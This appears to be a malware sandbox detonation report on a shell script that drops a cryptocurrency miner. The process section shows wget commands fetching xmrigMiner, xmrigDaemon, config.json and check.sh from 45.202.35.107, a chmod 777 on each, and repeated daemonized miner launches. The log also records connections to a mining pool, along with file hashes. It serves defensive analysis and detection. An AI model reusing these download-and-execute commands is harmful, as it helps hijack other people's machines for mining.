File opened for reading /sys/devices/system/node/node0/access0/initiators/write_bandwidth /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/write_latency /tmp/xmrigMiner N/A
File opened for reading /sys/firmware/dmi/tables/DMI /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/cpumap /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/read_bandwidth /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages /tmp/xmrigMiner N/A
File opened for reading /sys/kernel/mm/hugepages /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-1048576kB/free_hugepages /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/read_bandwidth /tmp/xmrigMiner N/A
File opened for reading /sys/devices/system/cpu /tmp/xmrigMiner N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/driver/nvidia/gpus /tmp/xmrigMiner N/A
File opened for reading /proc/meminfo /tmp/xmrigMiner N/A
File opened for reading /proc/mounts /tmp/xmrigMiner N/A
File opened for reading /proc/meminfo /tmp/xmrigMiner N/A
File opened for reading /proc/driver/nvidia/gpus /tmp/xmrigMiner N/A
File opened for reading /proc/170/status /usr/bin/pgrep N/A
File opened for reading /proc/172/status /usr/bin/pgrep N/A
File opened for reading /proc/587/status /usr/bin/pgrep N/A
File opened for reading /proc/version_signature /tmp/xmrigMiner N/A
File opened for reading /proc/179/status /usr/bin/pgrep N/A
File opened for reading /proc/183/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1150/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/driver/nvidia/gpus /tmp/xmrigMiner N/A
File opened for reading /proc/mounts /tmp/xmrigMiner N/A
File opened for reading /proc/sys/vm/nr_hugepages /tmp/xmrigMiner N/A
File opened for reading /proc/cmdline /tmp/xmrigMiner N/A
File opened for reading /proc/10/status /usr/bin/pgrep N/A
File opened for reading /proc/23/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/mounts /tmp/xmrigMiner N/A
File opened for reading /proc/1201/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/cmdline /tmp/xmrigMiner N/A
File opened for reading /proc/5/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/719/status /usr/bin/pgrep N/A
File opened for reading /proc/1191/status /usr/bin/pgrep N/A
File opened for reading /proc/sys/vm/nr_hugepages /tmp/xmrigMiner N/A
File opened for reading /proc/499/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/meminfo /tmp/xmrigMiner N/A
File opened for reading /proc/meminfo /tmp/xmrigMiner N/A
File opened for reading /proc/self/cpuset /tmp/xmrigMiner N/A
File opened for reading /proc/self/cpuset /tmp/xmrigMiner N/A
File opened for reading /proc/version_signature /tmp/xmrigMiner N/A
File opened for reading /proc/1031/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1286/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1365/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/974/status /usr/bin/pgrep N/A
File opened for reading /proc/1201/status /usr/bin/pgrep N/A
File opened for reading /proc/self/cpuset /tmp/xmrigMiner N/A
File opened for reading /proc/driver/nvidia/gpus /tmp/xmrigMiner N/A
File opened for reading /proc/version_signature /tmp/xmrigMiner N/A
File opened for reading /proc/1/status /usr/bin/pgrep N/A
File opened for reading /proc/770/status /usr/bin/pgrep N/A
File opened for reading /proc/961/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/self/cpuset /tmp/xmrigMiner N/A
File opened for reading /proc/545/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/cmdline /tmp/xmrigMiner N/A
File opened for reading /proc/version_signature /tmp/xmrigMiner N/A
File opened for reading /proc/cmdline /tmp/xmrigMiner N/A
File opened for reading /proc/driver/nvidia/gpus /tmp/xmrigMiner N/A
File opened for reading /proc/cmdline /tmp/xmrigMiner N/A
File opened for reading /proc/171/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/173/status /usr/bin/pgrep N/A
File opened for reading /proc/1129/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/16/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/cmdline /tmp/xmrigMiner N/A
File opened for reading /proc/driver/nvidia/gpus /tmp/xmrigMiner N/A
File opened for reading /proc/mounts /tmp/xmrigMiner N/A
File opened for reading /proc/1133/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1517/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1531/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/cmdline /tmp/xmrigMiner N/A
File opened for reading /proc/cmdline /tmp/xmrigMiner N/A
File opened for reading /proc/34/status /usr/bin/pgrep N/A
File opened for reading /proc/571/status /usr/bin/pgrep N/A
File opened for reading /proc/1232/cmdline /usr/bin/pgrep N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/check.sh /usr/bin/wget N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/xmrigMiner /usr/bin/wget N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/config.json /usr/bin/wget N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/xmrigDaemon /usr/bin/wget N/A
File opened for modification /tmp/config.json /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A
File opened for modification /tmp/logggz.lgo /tmp/xmrigMiner N/A

Processes

/tmp/8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh

[/tmp/8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh]

/usr/bin/wget

[wget http://45.202.35.107/xmrigDaemon]

/usr/bin/wget

[wget http://45.202.35.107/xmrigMiner]

/usr/bin/wget

[wget http://45.202.35.107/config.json]

/usr/bin/wget

[wget http://45.202.35.107/check.sh]

/bin/chmod

[chmod 777 xmrigMiner]

/bin/chmod

[chmod 777 xmrigDaemon]

/bin/chmod

[chmod 777 check.sh]

/tmp/check.sh

[./check.sh]

/usr/bin/pgrep

[pgrep -f xmrigDaemon]

/tmp/xmrigDaemon

[./xmrigDaemon]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

/bin/sh

[sh -c "./xmrigMiner" --daemonized]

/tmp/xmrigMiner

[./xmrigMiner --daemonized]

Network

Country Destination Domain Proto
UA 45.202.35.107:80 45.202.35.107 tcp
N/A 224.0.0.251:5353 udp
US 151.101.129.91:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.129.91:443 tcp
UA 45.202.35.107:80 45.202.35.107 tcp
GB 84.17.50.8:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.38:443 1527653184.rsc.cdn77.org tcp
UA 45.202.35.107:80 45.202.35.107 tcp
UA 45.202.35.107:80 45.202.35.107 tcp
US 1.1.1.1:53 fi.salvium.herominers.com udp
US 1.1.1.1:53 fi.salvium.herominers.com udp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp
FI 37.27.63.70:1230 fi.salvium.herominers.com tcp

Files

/tmp/xmrigDaemon

MD5 bd98e7c9ca771be14cd9229bc1636732
SHA1 4a4723378eb0268f4659f1b1d3f2be5f74e20b87
SHA256 0ea2d73e47b8642b24371be112fb04e455bc8577fa17911bd17793887cedeb7e
SHA512 cd641b0325242bfec608fae6d09c716d2a6519bf2aafeef025e7330c2c1e1c63d90b1b15307adcfa3d3fd4ccaff4003d4facc68038283f7b47ecdfd631380608

/tmp/xmrigMiner

MD5 98d1e494adf9aa586221feeaa74aaf8a
SHA1 2cbc1044034e21dbaaea4afce3aef772aa468041
SHA256 c58301ea640b622c52599d530e2a4d302025d4b23dca1b78f61405655733207f
SHA512 fdd937825c461ce010697b2bb44c6e78bdc7be682c49c4339719a1d2d4c3f38930dd8a0277461ce93f4cc80474a22836a20877da447cb8f8b73ce8182a2a0791

/tmp/check.sh

MD5 3284592438c4df2dd14b74cec93c6015
SHA1 1662db32dd1b9ebcf38b20b8d6c2212912bf250e
SHA256 b456d2835bda6f651883e81201e12e4b7fbb9ad644f17016fbf5553c155cf958
SHA512 54af1b77dcad7a64a5e5abfae973770e3702dad5f6c3a4738e06ae1cb2a677dea08bb3360a68a8ae9a0dec3d35355a7ecc0351bbe686f9f3ae55abfcc92b0af2

/tmp/logggz.lgo

MD5 68ca711184451bc4e72c5b615d4a8b5c
SHA1 d9a0f0fd8bdb37fdea7596ab52be43c254c81790
SHA256 ed2e669b35586da965d1579844463bcb26e73bcc38152f34bbae1529ea2330d9
SHA512 e6baa4fe37954cc820c8700f1a153865cee4b5d02c5caad295148c0e45714ed5cb3e42ca5c494ca9feb8e32f2ae550b2c2ea7e9e517fcb6d7857ef5e9bc3b851

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-24 01:53

Reported

2024-10-24 01:53

Platform

debian9-armhf-20240611-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-24 01:53

Reported

2024-10-24 01:53

Platform

debian9-mipsbe-20240418-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A